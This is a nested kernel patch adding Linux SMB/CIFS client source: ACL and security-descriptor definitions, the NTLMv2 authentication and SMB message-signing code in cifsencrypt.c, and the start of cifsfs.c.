++#define SYSTEM_AUDIT_OBJECT_ACE_TYPE	0x07
++#define SYSTEM_ALARM_OBJECT_ACE_TYPE	0x08
++#define ACCESS_ALLOWED_CALLBACK_ACE_TYPE 0x09
++#define ACCESS_DENIED_CALLBACK_ACE_TYPE	0x0A
++#define ACCESS_ALLOWED_CALLBACK_OBJECT_ACE_TYPE 0x0B
++#define ACCESS_DENIED_CALLBACK_OBJECT_ACE_TYPE  0x0C
++#define SYSTEM_AUDIT_CALLBACK_ACE_TYPE	0x0D
++#define SYSTEM_ALARM_CALLBACK_ACE_TYPE	0x0E /* Reserved */
++#define SYSTEM_AUDIT_CALLBACK_OBJECT_ACE_TYPE 0x0F
++#define SYSTEM_ALARM_CALLBACK_OBJECT_ACE_TYPE 0x10 /* reserved */
++#define SYSTEM_MANDATORY_LABEL_ACE_TYPE	0x11
++#define SYSTEM_RESOURCE_ATTRIBUTE_ACE_TYPE 0x12
++#define SYSTEM_SCOPED_POLICY_ID_ACE_TYPE 0x13
++
++/* ACE flags */
++#define OBJECT_INHERIT_ACE	0x01
++#define CONTAINER_INHERIT_ACE	0x02
++#define NO_PROPAGATE_INHERIT_ACE 0x04
++#define INHERIT_ONLY_ACE	0x08
++#define INHERITED_ACE		0x10
++#define SUCCESSFUL_ACCESS_ACE_FLAG 0x40
++#define FAILED_ACCESS_ACE_FLAG	0x80
++
++struct cifs_ace {
++	__u8 type; /* see above and MS-DTYP 2.4.4.1 */
++	__u8 flags;
++	__le16 size;
++	__le32 access_req;
++	struct cifs_sid sid; /* ie SID of the user or group who gets these perms */
++} __attribute__((packed));
++
++/*
++ * The current SMB3 form of security descriptor is similar to what was used for
++ * cifs (see above) but some fields are split, and the fields in the struct
++ * below match the names of fields in the spec, MS-DTYP (see sections 2.4.5 and
++ * 2.4.6). Note that "CamelCase" fields are used in this struct in order to
++ * match the MS-DTYP and MS-SMB2 specs which define the wire format.
++ */
++struct smb3_sd {
++	__u8 Revision; /* revision level, MUST be one */
++	__u8 Sbz1; /* only meaningful if 'RM' flag set below */
++	__le16 Control;
++	__le32 OffsetOwner;
++	__le32 OffsetGroup;
++	__le32 OffsetSacl;
++	__le32 OffsetDacl;
++} __packed;
++
++/* Meaning of 'Control' field flags */
++#define ACL_CONTROL_SR	0x8000	/* Self relative */
++#define ACL_CONTROL_RM	0x4000	/* Resource manager control bits */
++#define ACL_CONTROL_PS	0x2000	/* SACL protected from inherits */
++#define ACL_CONTROL_PD	0x1000	/* DACL protected from inherits */
++#define ACL_CONTROL_SI	0x0800	/* SACL Auto-Inherited */
++#define ACL_CONTROL_DI	0x0400	/* DACL Auto-Inherited */
++#define ACL_CONTROL_SC	0x0200	/* SACL computed through inheritance */
++#define ACL_CONTROL_DC	0x0100	/* DACL computed through inheritance */
++#define ACL_CONTROL_SS	0x0080	/* Create server ACL */
++#define ACL_CONTROL_DT	0x0040	/* DACL provided by trusted source */
++#define ACL_CONTROL_SD	0x0020	/* SACL defaulted */
++#define ACL_CONTROL_SP	0x0010	/* SACL is present on object */
++#define ACL_CONTROL_DD	0x0008	/* DACL defaulted */
++#define ACL_CONTROL_DP	0x0004	/* DACL is present on object */
++#define ACL_CONTROL_GD	0x0002	/* Group was defaulted */
++#define ACL_CONTROL_OD	0x0001	/* User was defaulted */
++
++/* Meaning of AclRevision flags */
++#define ACL_REVISION	0x02 /* See section 2.4.4.1 of MS-DTYP */
++#define ACL_REVISION_DS	0x04 /* Additional AceTypes allowed */
++
++struct smb3_acl {
++	u8 AclRevision; /* revision level */
++	u8 Sbz1; /* MBZ */
++	__le16 AclSize;
++	__le16 AceCount;
++	__le16 Sbz2; /* MBZ */
++} __packed;
++
++/*
++ * Used to store the special 'NFS SIDs' used to persist the POSIX uid and gid
++ * See http://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx
++ */
++struct owner_sid {
++	u8 Revision;
++	u8 NumAuth;
++	u8 Authority[6];
++	__le32 SubAuthorities[3];
++} __packed;
++
++struct owner_group_sids {
++	struct owner_sid owner;
++	struct owner_sid group;
++} __packed;
++
++/*
++ * The minimum security identifier is one for system-defined Users
++ * and Groups, such as the NULL SID and World, or for Built-in accounts
++ * such as Administrator and Guest, and consists of
++ * Revision + Num (Sub)Auths + Authority + Domain (one Subauthority)
++ */
++#define MIN_SID_LEN  (1 + 1 + 6 + 4) /* in bytes */
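++/* e.g. the NULL SID S-1-0-0 is exactly MIN_SID_LEN bytes: 1 + 1 + 6 + (1 * 4) */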
++
++/*
++ * The minimum security descriptor is one without any SACL or DACL and
++ * consists of revision, type, and two SIDs of minimum size for owner and group
++ */
++#define MIN_SEC_DESC_LEN  (sizeof(struct cifs_ntsd) + (2 * MIN_SID_LEN))
++
++#endif /* _CIFSACL_H */
+diff --git a/fs/smb/client/cifsencrypt.c b/fs/smb/client/cifsencrypt.c
+new file mode 100644
+index 0000000000000..d0ac2648c0d61
+--- /dev/null
++++ b/fs/smb/client/cifsencrypt.c
+@@ -0,0 +1,733 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Encryption and hashing operations relating to NTLM, NTLMv2.  See MS-NLMP
++ *   for more detailed information
++ *
++ *   Copyright (C) International Business Machines  Corp., 2005,2013
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#include <linux/fs.h>
++#include <linux/slab.h>
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifs_debug.h"
++#include "cifs_unicode.h"
++#include "cifsproto.h"
++#include "ntlmssp.h"
++#include <linux/ctype.h>
++#include <linux/random.h>
++#include <linux/highmem.h>
++#include <linux/fips.h>
++#include "../common/arc4.h"
++#include <crypto/aead.h>
++
++int __cifs_calc_signature(struct smb_rqst *rqst,
++			struct TCP_Server_Info *server, char *signature,
++			struct shash_desc *shash)
++{
++	int i;
++	int rc;
++	struct kvec *iov = rqst->rq_iov;
++	int n_vec = rqst->rq_nvec;
++
++	/* iov[0] is actual data and not the rfc1002 length for SMB2+ */
++	if (!is_smb1(server)) {
++		if (iov[0].iov_len <= 4)
++			return -EIO;
++		i = 0;
++	} else {
++		if (n_vec < 2 || iov[0].iov_len != 4)
++			return -EIO;
++		i = 1; /* skip rfc1002 length */
++	}
++
++	for (; i < n_vec; i++) {
++		if (iov[i].iov_len == 0)
++			continue;
++		if (iov[i].iov_base == NULL) {
++			cifs_dbg(VFS, "null iovec entry\n");
++			return -EIO;
++		}
++
++		rc = crypto_shash_update(shash,
++					 iov[i].iov_base, iov[i].iov_len);
++		if (rc) {
++			cifs_dbg(VFS, "%s: Could not update with payload\n",
++				 __func__);
++			return rc;
++		}
++	}
++
++	/* now hash over the rq_pages array */
++	for (i = 0; i < rqst->rq_npages; i++) {
++		void *kaddr;
++		unsigned int len, offset;
++
++		rqst_page_get_length(rqst, i, &len, &offset);
++
++		kaddr = (char *) kmap(rqst->rq_pages[i]) + offset;
++
++		rc = crypto_shash_update(shash, kaddr, len);
++		if (rc) {
++			cifs_dbg(VFS, "%s: Could not update with payload\n",
++				 __func__);
++			kunmap(rqst->rq_pages[i]);
++			return rc;
++		}
++
++		kunmap(rqst->rq_pages[i]);
++	}
++
++	rc = crypto_shash_final(shash, signature);
++	if (rc)
++		cifs_dbg(VFS, "%s: Could not generate hash\n", __func__);
++
++	return rc;
++}
++
++/*
++ * Calculate and return the CIFS signature based on the mac key and SMB PDU.
++ * The 16 byte signature must be allocated by the caller. Note we only use the
++ * first eight bytes and that the smb header signature field on input contains
++ * the sequence number before this function is called. Also, this function
++ * should be called with the server->srv_mutex held.
++ */
++static int cifs_calc_signature(struct smb_rqst *rqst,
++			struct TCP_Server_Info *server, char *signature)
++{
++	int rc;
++
++	if (!rqst->rq_iov || !signature || !server)
++		return -EINVAL;
++
++	rc = cifs_alloc_hash("md5", &server->secmech.md5);
++	if (rc)
++		return -1;
++
++	rc = crypto_shash_init(server->secmech.md5);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not init md5\n", __func__);
++		return rc;
++	}
++
++	rc = crypto_shash_update(server->secmech.md5,
++		server->session_key.response, server->session_key.len);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not update with response\n", __func__);
++		return rc;
++	}
++
++	return __cifs_calc_signature(rqst, server, signature, server->secmech.md5);
++}
++
++/* must be called with server->srv_mutex held */
++int cifs_sign_rqst(struct smb_rqst *rqst, struct TCP_Server_Info *server,
++		   __u32 *pexpected_response_sequence_number)
++{
++	int rc = 0;
++	char smb_signature[20];
++	struct smb_hdr *cifs_pdu = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
++
++	if (rqst->rq_iov[0].iov_len != 4 ||
++	    rqst->rq_iov[0].iov_base + 4 != rqst->rq_iov[1].iov_base)
++		return -EIO;
++
++	if ((cifs_pdu == NULL) || (server == NULL))
++		return -EINVAL;
++
++	spin_lock(&server->srv_lock);
++	if (!(cifs_pdu->Flags2 & SMBFLG2_SECURITY_SIGNATURE) ||
++	    server->tcpStatus == CifsNeedNegotiate) {
++		spin_unlock(&server->srv_lock);
++		return rc;
++	}
++	spin_unlock(&server->srv_lock);
++
++	if (!server->session_estab) {
++		memcpy(cifs_pdu->Signature.SecuritySignature, "BSRSPYL", 8);
++		return rc;
++	}
++
++	cifs_pdu->Signature.Sequence.SequenceNumber =
++				cpu_to_le32(server->sequence_number);
++	cifs_pdu->Signature.Sequence.Reserved = 0;
++
++	*pexpected_response_sequence_number = ++server->sequence_number;
++	++server->sequence_number;
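++	/*
++	 * The request consumes one sequence number and the server's signed
++	 * response will consume the next, hence the two increments above.
++	 */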
++
++	rc = cifs_calc_signature(rqst, server, smb_signature);
++	if (rc)
++		memset(cifs_pdu->Signature.SecuritySignature, 0, 8);
++	else
++		memcpy(cifs_pdu->Signature.SecuritySignature, smb_signature, 8);
++
++	return rc;
++}
++
++int cifs_sign_smbv(struct kvec *iov, int n_vec, struct TCP_Server_Info *server,
++		   __u32 *pexpected_response_sequence)
++{
++	struct smb_rqst rqst = { .rq_iov = iov,
++				 .rq_nvec = n_vec };
++
++	return cifs_sign_rqst(&rqst, server, pexpected_response_sequence);
++}
++
++/* must be called with server->srv_mutex held */
++int cifs_sign_smb(struct smb_hdr *cifs_pdu, struct TCP_Server_Info *server,
++		  __u32 *pexpected_response_sequence_number)
++{
++	struct kvec iov[2];
++
++	iov[0].iov_base = cifs_pdu;
++	iov[0].iov_len = 4;
++	iov[1].iov_base = (char *)cifs_pdu + 4;
++	iov[1].iov_len = be32_to_cpu(cifs_pdu->smb_buf_length);
++
++	return cifs_sign_smbv(iov, 2, server,
++			      pexpected_response_sequence_number);
++}
++
++int cifs_verify_signature(struct smb_rqst *rqst,
++			  struct TCP_Server_Info *server,
++			  __u32 expected_sequence_number)
++{
++	int rc;
++	char server_response_sig[8];
++	char what_we_think_sig_should_be[20];
++	struct smb_hdr *cifs_pdu = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
++
++	if (rqst->rq_iov[0].iov_len != 4 ||
++	    rqst->rq_iov[0].iov_base + 4 != rqst->rq_iov[1].iov_base)
++		return -EIO;
++
++	if (cifs_pdu == NULL || server == NULL)
++		return -EINVAL;
++
++	if (!server->session_estab)
++		return 0;
++
++	if (cifs_pdu->Command == SMB_COM_LOCKING_ANDX) {
++		struct smb_com_lock_req *pSMB =
++			(struct smb_com_lock_req *)cifs_pdu;
++		if (pSMB->LockType & LOCKING_ANDX_OPLOCK_RELEASE)
++			return 0;
++	}
++
++	/* BB what if signatures are supposed to be on for session but
++	   server does not send one? BB */
++
++	/* Do not need to verify session setups with signature "BSRSPYL "  */
++	if (memcmp(cifs_pdu->Signature.SecuritySignature, "BSRSPYL ", 8) == 0)
++		cifs_dbg(FYI, "dummy signature received for smb command 0x%x\n",
++			 cifs_pdu->Command);
++
++	/* save off the original signature so we can modify the smb and check
++		its signature against what the server sent */
++	memcpy(server_response_sig, cifs_pdu->Signature.SecuritySignature, 8);
++
++	cifs_pdu->Signature.Sequence.SequenceNumber =
++					cpu_to_le32(expected_sequence_number);
++	cifs_pdu->Signature.Sequence.Reserved = 0;
++
++	cifs_server_lock(server);
++	rc = cifs_calc_signature(rqst, server, what_we_think_sig_should_be);
++	cifs_server_unlock(server);
++
++	if (rc)
++		return rc;
++
++/*	cifs_dump_mem("what we think it should be: ",
++		      what_we_think_sig_should_be, 16); */
++
++	if (memcmp(server_response_sig, what_we_think_sig_should_be, 8))
++		return -EACCES;
++	else
++		return 0;
++}
++
++/* Build a proper attribute value/target info pairs blob.
++ * Fill in netbios and dns domain name and workstation name
++ * and client time (five av pairs in total, plus one end-of-fields indicator).
++ * Allocate domain name which gets freed when session struct is deallocated.
++ */
++static int
++build_avpair_blob(struct cifs_ses *ses, const struct nls_table *nls_cp)
++{
++	unsigned int dlen;
++	unsigned int size = 2 * sizeof(struct ntlmssp2_name);
++	char *defdmname = "WORKGROUP";
++	unsigned char *blobptr;
++	struct ntlmssp2_name *attrptr;
++
++	if (!ses->domainName) {
++		ses->domainName = kstrdup(defdmname, GFP_KERNEL);
++		if (!ses->domainName)
++			return -ENOMEM;
++	}
++
++	dlen = strlen(ses->domainName);
++
++	/*
++	 * The length of this blob is twice the size of a
++	 * structure (av pair) which holds name/size
++	 * (for NTLMSSP_AV_NB_DOMAIN_NAME followed by NTLMSSP_AV_EOL) plus
++	 * the unicode length of a netbios domain name
++	 */
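++	/*
++	 * e.g. with the default domain "WORKGROUP" (dlen = 9), and assuming
++	 * a 4-byte av pair header (16-bit type + 16-bit length), this is
++	 * 2 * 4 + 2 * 9 = 26 bytes; the zeroed second header doubles as the
++	 * NTLMSSP_AV_EOL terminator.
++	 */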
++	kfree_sensitive(ses->auth_key.response);
++	ses->auth_key.len = size + 2 * dlen;
++	ses->auth_key.response = kzalloc(ses->auth_key.len, GFP_KERNEL);
++	if (!ses->auth_key.response) {
++		ses->auth_key.len = 0;
++		return -ENOMEM;
++	}
++
++	blobptr = ses->auth_key.response;
++	attrptr = (struct ntlmssp2_name *) blobptr;
++
++	/*
++	 * As defined in MS-NLMP 3.3.2, just this av pair field
++	 * is sufficient as part of the temp
++	 */
++	attrptr->type = cpu_to_le16(NTLMSSP_AV_NB_DOMAIN_NAME);
++	attrptr->length = cpu_to_le16(2 * dlen);
++	blobptr = (unsigned char *)attrptr + sizeof(struct ntlmssp2_name);
++	cifs_strtoUTF16((__le16 *)blobptr, ses->domainName, dlen, nls_cp);
++
++	return 0;
++}
++
++/* Server has provided av pairs/target info in the type 2 challenge
++ * packet and we have plucked it and stored it within the smb session.
++ * We parse that blob here to find the netbios domain name to be used
++ * as part of ntlmv2 authentication (in Target String), if not already
++ * specified on the command line.
++ * If this function returns without any error but without fetching
++ * the domain name, authentication may fail against some servers but
++ * not against others (those that are not very particular about the
++ * target string; for some, just the user name might suffice).
++ */
++static int
++find_domain_name(struct cifs_ses *ses, const struct nls_table *nls_cp)
++{
++	unsigned int attrsize;
++	unsigned int type;
++	unsigned int onesize = sizeof(struct ntlmssp2_name);
++	unsigned char *blobptr;
++	unsigned char *blobend;
++	struct ntlmssp2_name *attrptr;
++
++	if (!ses->auth_key.len || !ses->auth_key.response)
++		return 0;
++
++	blobptr = ses->auth_key.response;
++	blobend = blobptr + ses->auth_key.len;
++
++	while (blobptr + onesize < blobend) {
++		attrptr = (struct ntlmssp2_name *) blobptr;
++		type = le16_to_cpu(attrptr->type);
++		if (type == NTLMSSP_AV_EOL)
++			break;
++		blobptr += 2; /* advance attr type */
++		attrsize = le16_to_cpu(attrptr->length);
++		blobptr += 2; /* advance attr size */
++		if (blobptr + attrsize > blobend)
++			break;
++		if (type == NTLMSSP_AV_NB_DOMAIN_NAME) {
++			if (!attrsize || attrsize >= CIFS_MAX_DOMAINNAME_LEN)
++				break;
++			if (!ses->domainName) {
++				ses->domainName =
++					kmalloc(attrsize + 1, GFP_KERNEL);
++				if (!ses->domainName)
++					return -ENOMEM;
++				cifs_from_utf16(ses->domainName,
++					(__le16 *)blobptr, attrsize, attrsize,
++					nls_cp, NO_MAP_UNI_RSVD);
++				break;
++			}
++		}
++		blobptr += attrsize; /* advance attr value */
++	}
++
++	return 0;
++}
++
++/* Server has provided av pairs/target info in the type 2 challenge
++ * packet and we have plucked it and stored it within the smb session.
++ * We parse that blob here to find the server-given timestamp to use
++ * as part of ntlmv2 authentication (falling back to the local current
++ * time in case of failure)
++ */
++static __le64
++find_timestamp(struct cifs_ses *ses)
++{
++	unsigned int attrsize;
++	unsigned int type;
++	unsigned int onesize = sizeof(struct ntlmssp2_name);
++	unsigned char *blobptr;
++	unsigned char *blobend;
++	struct ntlmssp2_name *attrptr;
++	struct timespec64 ts;
++
++	if (!ses->auth_key.len || !ses->auth_key.response)
++		return 0;
++
++	blobptr = ses->auth_key.response;
++	blobend = blobptr + ses->auth_key.len;
++
++	while (blobptr + onesize < blobend) {
++		attrptr = (struct ntlmssp2_name *) blobptr;
++		type = le16_to_cpu(attrptr->type);
++		if (type == NTLMSSP_AV_EOL)
++			break;
++		blobptr += 2; /* advance attr type */
++		attrsize = le16_to_cpu(attrptr->length);
++		blobptr += 2; /* advance attr size */
++		if (blobptr + attrsize > blobend)
++			break;
++		if (type == NTLMSSP_AV_TIMESTAMP) {
++			if (attrsize == sizeof(u64))
++				return *((__le64 *)blobptr);
++		}
++		blobptr += attrsize; /* advance attr value */
++	}
++
++	ktime_get_real_ts64(&ts);
++	return cpu_to_le64(cifs_UnixTimeToNT(ts));
++}
++
++static int calc_ntlmv2_hash(struct cifs_ses *ses, char *ntlmv2_hash,
++			    const struct nls_table *nls_cp)
++{
++	int rc = 0;
++	int len;
++	char nt_hash[CIFS_NTHASH_SIZE];
++	__le16 *user;
++	wchar_t *domain;
++	wchar_t *server;
++
++	if (!ses->server->secmech.hmacmd5) {
++		cifs_dbg(VFS, "%s: can't generate ntlmv2 hash\n", __func__);
++		return -1;
++	}
++
++	/* calculate md4 hash of password */
++	E_md4hash(ses->password, nt_hash, nls_cp);
++
++	rc = crypto_shash_setkey(ses->server->secmech.hmacmd5->tfm, nt_hash,
++				CIFS_NTHASH_SIZE);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not set NT Hash as a key\n", __func__);
++		return rc;
++	}
++
++	rc = crypto_shash_init(ses->server->secmech.hmacmd5);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not init hmacmd5\n", __func__);
++		return rc;
++	}
++
++	/* convert ses->user_name to unicode */
++	len = ses->user_name ? strlen(ses->user_name) : 0;
++	user = kmalloc(2 + (len * 2), GFP_KERNEL);
++	if (user == NULL) {
++		rc = -ENOMEM;
++		return rc;
++	}
++
++	if (len) {
++		len = cifs_strtoUTF16(user, ses->user_name, len, nls_cp);
++		UniStrupr(user);
++	} else {
++		memset(user, '\0', 2);
++	}
++
++	rc = crypto_shash_update(ses->server->secmech.hmacmd5,
++				(char *)user, 2 * len);
++	kfree(user);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not update with user\n", __func__);
++		return rc;
++	}
++
++	/* convert ses->domainName to unicode and uppercase */
++	if (ses->domainName) {
++		len = strlen(ses->domainName);
++
++		domain = kmalloc(2 + (len * 2), GFP_KERNEL);
++		if (domain == NULL) {
++			rc = -ENOMEM;
++			return rc;
++		}
++		len = cifs_strtoUTF16((__le16 *)domain, ses->domainName, len,
++				      nls_cp);
++		rc = crypto_shash_update(ses->server->secmech.hmacmd5,
++					 (char *)domain, 2 * len);
++		kfree(domain);
++		if (rc) {
++			cifs_dbg(VFS, "%s: Could not update with domain\n",
++				 __func__);
++			return rc;
++		}
++	} else {
++		/* We use ses->ip_addr if no domain name available */
++		len = strlen(ses->ip_addr);
++
++		server = kmalloc(2 + (len * 2), GFP_KERNEL);
++		if (server == NULL) {
++			rc = -ENOMEM;
++			return rc;
++		}
++		len = cifs_strtoUTF16((__le16 *)server, ses->ip_addr, len,
++					nls_cp);
++		rc = crypto_shash_update(ses->server->secmech.hmacmd5,
++					 (char *)server, 2 * len);
++		kfree(server);
++		if (rc) {
++			cifs_dbg(VFS, "%s: Could not update with server\n",
++				 __func__);
++			return rc;
++		}
++	}
++
++	rc = crypto_shash_final(ses->server->secmech.hmacmd5,
++					ntlmv2_hash);
++	if (rc)
++		cifs_dbg(VFS, "%s: Could not generate md5 hash\n", __func__);
++
++	return rc;
++}
++
++static int
++CalcNTLMv2_response(const struct cifs_ses *ses, char *ntlmv2_hash)
++{
++	int rc;
++	struct ntlmv2_resp *ntlmv2 = (struct ntlmv2_resp *)
++	    (ses->auth_key.response + CIFS_SESS_KEY_SIZE);
++	unsigned int hash_len;
++
++	/* The MD5 hash starts at challenge_key.key */
++	hash_len = ses->auth_key.len - (CIFS_SESS_KEY_SIZE +
++		offsetof(struct ntlmv2_resp, challenge.key[0]));
++
++	if (!ses->server->secmech.hmacmd5) {
++		cifs_dbg(VFS, "%s: can't generate ntlmv2 hash\n", __func__);
++		return -1;
++	}
++
++	rc = crypto_shash_setkey(ses->server->secmech.hmacmd5->tfm,
++				 ntlmv2_hash, CIFS_HMAC_MD5_HASH_SIZE);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not set NTLMV2 Hash as a key\n",
++			 __func__);
++		return rc;
++	}
++
++	rc = crypto_shash_init(ses->server->secmech.hmacmd5);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not init hmacmd5\n", __func__);
++		return rc;
++	}
++
++	if (ses->server->negflavor == CIFS_NEGFLAVOR_EXTENDED)
++		memcpy(ntlmv2->challenge.key,
++		       ses->ntlmssp->cryptkey, CIFS_SERVER_CHALLENGE_SIZE);
++	else
++		memcpy(ntlmv2->challenge.key,
++		       ses->server->cryptkey, CIFS_SERVER_CHALLENGE_SIZE);
++	rc = crypto_shash_update(ses->server->secmech.hmacmd5,
++				 ntlmv2->challenge.key, hash_len);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not update with response\n", __func__);
++		return rc;
++	}
++
++	/* Note that the MD5 digest overwrites anon.challenge_key.key */
++	rc = crypto_shash_final(ses->server->secmech.hmacmd5,
++				ntlmv2->ntlmv2_hash);
++	if (rc)
++		cifs_dbg(VFS, "%s: Could not generate md5 hash\n", __func__);
++
++	return rc;
++}
++
++int
++setup_ntlmv2_rsp(struct cifs_ses *ses, const struct nls_table *nls_cp)
++{
++	int rc;
++	int baselen;
++	unsigned int tilen;
++	struct ntlmv2_resp *ntlmv2;
++	char ntlmv2_hash[16];
++	unsigned char *tiblob = NULL; /* target info blob */
++	__le64 rsp_timestamp;
++
++	if (nls_cp == NULL) {
++		cifs_dbg(VFS, "%s called with nls_cp==NULL\n", __func__);
++		return -EINVAL;
++	}
++
++	if (ses->server->negflavor == CIFS_NEGFLAVOR_EXTENDED) {
++		if (!ses->domainName) {
++			if (ses->domainAuto) {
++				rc = find_domain_name(ses, nls_cp);
++				if (rc) {
++					cifs_dbg(VFS, "error %d finding domain name\n",
++						 rc);
++					goto setup_ntlmv2_rsp_ret;
++				}
++			} else {
++				ses->domainName = kstrdup("", GFP_KERNEL);
++			}
++		}
++	} else {
++		rc = build_avpair_blob(ses, nls_cp);
++		if (rc) {
++			cifs_dbg(VFS, "error %d building av pair blob\n", rc);
++			goto setup_ntlmv2_rsp_ret;
++		}
++	}
++
++	/* Must be within 5 minutes of the server (or in range +/-2h
++	 * in case of Mac OS X), so simply carry over server timestamp
++	 * (as Windows 7 does)
++	 */
++	rsp_timestamp = find_timestamp(ses);
++
++	baselen = CIFS_SESS_KEY_SIZE + sizeof(struct ntlmv2_resp);
++	tilen = ses->auth_key.len;
++	tiblob = ses->auth_key.response;
++
++	ses->auth_key.response = kmalloc(baselen + tilen, GFP_KERNEL);
++	if (!ses->auth_key.response) {
++		rc = -ENOMEM;
++		ses->auth_key.len = 0;
++		goto setup_ntlmv2_rsp_ret;
++	}
++	ses->auth_key.len += baselen;
++
++	ntlmv2 = (struct ntlmv2_resp *)
++			(ses->auth_key.response + CIFS_SESS_KEY_SIZE);
++	ntlmv2->blob_signature = cpu_to_le32(0x00000101);
++	ntlmv2->reserved = 0;
++	ntlmv2->time = rsp_timestamp;
++
++	get_random_bytes(&ntlmv2->client_chal, sizeof(ntlmv2->client_chal));
++	ntlmv2->reserved2 = 0;
++
++	memcpy(ses->auth_key.response + baselen, tiblob, tilen);
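++	/*
++	 * auth_key.response now holds CIFS_SESS_KEY_SIZE bytes (filled in
++	 * with the session key below), then the ntlmv2_resp header, then
++	 * the target info blob just copied.
++	 */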
++
++	cifs_server_lock(ses->server);
++
++	rc = cifs_alloc_hash("hmac(md5)", &ses->server->secmech.hmacmd5);
++	if (rc)
++		goto unlock;
++
++	/* calculate ntlmv2_hash */
++	rc = calc_ntlmv2_hash(ses, ntlmv2_hash, nls_cp);
++	if (rc) {
++		cifs_dbg(VFS, "Could not get v2 hash rc %d\n", rc);
++		goto unlock;
++	}
++
++	/* calculate first part of the client response (CR1) */
++	rc = CalcNTLMv2_response(ses, ntlmv2_hash);
++	if (rc) {
++		cifs_dbg(VFS, "Could not calculate CR1 rc: %d\n", rc);
++		goto unlock;
++	}
++
++	/* now calculate the session key for NTLMv2 */
++	rc = crypto_shash_setkey(ses->server->secmech.hmacmd5->tfm,
++		ntlmv2_hash, CIFS_HMAC_MD5_HASH_SIZE);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not set NTLMV2 Hash as a key\n",
++			 __func__);
++		goto unlock;
++	}
++
++	rc = crypto_shash_init(ses->server->secmech.hmacmd5);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not init hmacmd5\n", __func__);
++		goto unlock;
++	}
++
++	rc = crypto_shash_update(ses->server->secmech.hmacmd5,
++		ntlmv2->ntlmv2_hash,
++		CIFS_HMAC_MD5_HASH_SIZE);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not update with response\n", __func__);
++		goto unlock;
++	}
++
++	rc = crypto_shash_final(ses->server->secmech.hmacmd5,
++		ses->auth_key.response);
++	if (rc)
++		cifs_dbg(VFS, "%s: Could not generate md5 hash\n", __func__);
++
++unlock:
++	cifs_server_unlock(ses->server);
++setup_ntlmv2_rsp_ret:
++	kfree_sensitive(tiblob);
++
++	return rc;
++}
++
++int
++calc_seckey(struct cifs_ses *ses)
++{
++	unsigned char sec_key[CIFS_SESS_KEY_SIZE]; /* a nonce */
++	struct arc4_ctx *ctx_arc4;
++
++	if (fips_enabled)
++		return -ENODEV;
++
++	get_random_bytes(sec_key, CIFS_SESS_KEY_SIZE);
++
++	ctx_arc4 = kmalloc(sizeof(*ctx_arc4), GFP_KERNEL);
++	if (!ctx_arc4) {
++		cifs_dbg(VFS, "Could not allocate arc4 context\n");
++		return -ENOMEM;
++	}
++
++	cifs_arc4_setkey(ctx_arc4, ses->auth_key.response, CIFS_SESS_KEY_SIZE);
++	cifs_arc4_crypt(ctx_arc4, ses->ntlmssp->ciphertext, sec_key,
++			CIFS_CPHTXT_SIZE);
++
++	/* make secondary_key/nonce as session key */
++	memcpy(ses->auth_key.response, sec_key, CIFS_SESS_KEY_SIZE);
++	/* and make len as that of session key only */
++	ses->auth_key.len = CIFS_SESS_KEY_SIZE;
++
++	memzero_explicit(sec_key, CIFS_SESS_KEY_SIZE);
++	kfree_sensitive(ctx_arc4);
++	return 0;
++}
++
++void
++cifs_crypto_secmech_release(struct TCP_Server_Info *server)
++{
++	cifs_free_hash(&server->secmech.aes_cmac);
++	cifs_free_hash(&server->secmech.hmacsha256);
++	cifs_free_hash(&server->secmech.md5);
++	cifs_free_hash(&server->secmech.sha512);
++	cifs_free_hash(&server->secmech.hmacmd5);
++
++	if (server->secmech.enc) {
++		crypto_free_aead(server->secmech.enc);
++		server->secmech.enc = NULL;
++	}
++
++	if (server->secmech.dec) {
++		crypto_free_aead(server->secmech.dec);
++		server->secmech.dec = NULL;
++	}
++}
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+new file mode 100644
+index 0000000000000..078df1e2dd18a
+--- /dev/null
++++ b/fs/smb/client/cifsfs.c
+@@ -0,0 +1,1857 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ *   Common Internet FileSystem (CIFS) client
++ *
++ */
++
++/* Note that BB means BUGBUG (ie something to fix eventually) */
++
++#include <linux/module.h>
++#include <linux/fs.h>
++#include <linux/mount.h>
++#include <linux/slab.h>
++#include <linux/init.h>
++#include <linux/list.h>
++#include <linux/seq_file.h>
++#include <linux/vfs.h>
++#include <linux/mempool.h>
++#include <linux/delay.h>
++#include <linux/kthread.h>
++#include <linux/freezer.h>
++#include <linux/namei.h>
++#include <linux/random.h>
++#include <linux/uuid.h>
++#include <linux/xattr.h>
++#include <uapi/linux/magic.h>
++#include <net/ipv6.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#define DECLARE_GLOBALS_HERE
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include <linux/mm.h>
++#include <linux/key-type.h>
++#include "cifs_spnego.h"
++#include "fscache.h"
++#ifdef CONFIG_CIFS_DFS_UPCALL
++#include "dfs_cache.h"
++#endif
++#ifdef CONFIG_CIFS_SWN_UPCALL
++#include "netlink.h"
++#endif
++#include "fs_context.h"
++#include "cached_dir.h"
++
++/*
++ * DOS dates from 1980/1/1 through 2107/12/31
++ * Protocol specifications indicate the range should be to 119, which
++ * limits maximum year to 2099. But this range has not been checked.
++ */
++#define SMB_DATE_MAX (127<<9 | 12<<5 | 31)
++#define SMB_DATE_MIN (0<<9 | 1<<5 | 1)
++#define SMB_TIME_MAX (23<<11 | 59<<5 | 29)
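++/*
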